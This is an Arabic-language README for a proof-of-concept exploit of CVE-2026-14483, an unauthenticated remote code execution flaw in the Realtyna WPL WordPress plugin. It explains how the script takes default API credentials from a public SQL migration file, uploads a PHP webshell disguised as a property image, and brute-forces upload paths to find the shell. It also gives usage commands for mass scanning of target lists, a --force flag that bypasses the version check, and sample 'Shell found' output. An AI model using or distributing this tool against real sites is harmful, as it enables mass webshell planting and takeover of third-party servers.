
CVE-2026-14483 POC EXPLOIT بواسطة MADEXPLOITS
تنفيذ أوامر عن بُعد بدون مصادقة ضد البرنامج المساعد Realtyna WPL Real Estate Listing الخاص بـ WordPress.
| الحقل | التفاصيل |
|---|---|
| CVE | CVE-2026-14483 |
| الإصدار المتأثر | <= 5.2.0 |
| البرنامج المساعد | real-estate-listing-realtyna-wpl |
| التأثير | رفع ويبشيل PHP بدون مصادقة (RCE) |
| السكربت | CVE-2026-14483.py |
| المؤلف | MADEXPLOITS |
بشكل افتراضي، يستغل السكربت فقط الأهداف التي تعمل بالإصدار 5.2.0 من WPL. استخدم
--forceلتجاوز هذا السلوك.
api_key / api_secret الافتراضية من خلال تفريغ SQL عام لملفات الترحيل.set_property)، مما يسمح برفع ملف PHP مُصمَّم خصيصًا كصورة عقار.wp-content/uploads/WPL/{property_id}/.pip install requests colorama
أنشئ ملفًا نصيًا يحتوي على عنوان أساسي واحد في كل سطر:
http://wplab.test
https://example.com
python CVE-2026-14483.py --targets targets.txt
تُلحق روابط الصدفات الناجحة بملف result.txt (أو --output).
python CVE-2026-14483.py \
--targets targets.txt \
--output result.txt \
--user-id 1 \
--max-id 1000 \
--timeout 30 \
--threads 5 \
--debug \
--force
| الوسيط | الافتراضي | الوصف |
|---|---|---|
--targets | (مطلوب) | ملف يحتوي على العناوين الأساسية (واحد في كل سطر) |
--output | result.txt | ملف تُلحق به روابط الصدفات المكتشفة |
--user-id | 1 | معرف مستخدم WordPress / WPL الذي يملك العقار الجديد |
--payload | صدفة الرفع المدمجة | سلسلة حمولة PHP مخصصة |
--max-id | 1000 | أقصى معرف عقار للاختراق القسري عند تحديد موقع الصدفة |
--timeout | 30 | مهلة HTTP بالثواني |
--threads | 5 | عدد خيوط العمل المتزامنة |
--debug | off | تسجيل تصحيح مفصّل |
--force | off | الاستغلال حتى لو كان الإصدار ≠ 5.2.0 أو تعذّر اكتشافه |
Target URL
│
▼
Detect WPL version (readme.txt / wpl.php)
│ skip unless == 5.2.0 (or --force)
▼
Fetch api_key + api_secret from:
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
│
▼
POST set_property via WPL I/O API
(upload image_0x89MADEXPLOITS.php as image/jpeg)
│
▼
Brute-force property ID 1..max-id
/wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
│
▼
Write shell URL → output file
علامة الصدفة الافتراضية: MADEXPLOITS
اسم الملف البعيد الافتراضي: 0x89MADEXPLOITS.php
هدف مخبري واحد (بيئة العمل هذه):
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug
فحص جماعي بتزامن أعلى:
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt
إجبار الاستغلال عند فشل فحص الإصدار:
python CVE-2026-14483.py --targets targets.txt --force
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.
يحتوي result.txt على رابط صدفة واحدة في كل سطر.
Stable tag: / Version: في ملف readme.txt الخاص بالبرنامج المساعد، مع التراجع إلى wpl.php.--max-id.